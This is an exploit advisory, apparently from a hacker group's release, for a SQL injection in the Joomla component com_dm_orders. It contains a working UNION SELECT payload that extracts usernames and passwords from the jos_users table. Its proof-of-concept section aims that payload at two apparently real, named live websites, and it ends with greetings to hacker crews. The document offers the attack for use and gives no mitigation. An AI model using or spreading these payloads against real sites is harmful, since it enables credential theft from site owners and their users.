==============================================================================


  [o] Joomla Components [ com_dm_orders ] SQL Injection Vulnerability

       Software : com_dm_orders [ joomla components ]
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/


==============================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1



  [o] Proof of Concept

       http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
       http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54


==============================================================================


  [o] Greetz

       Anti Security [ http://antisecurity.org ]
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe
       H312Y yooogy mousekill }^-^{ martfella noname s4va
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==============================================================================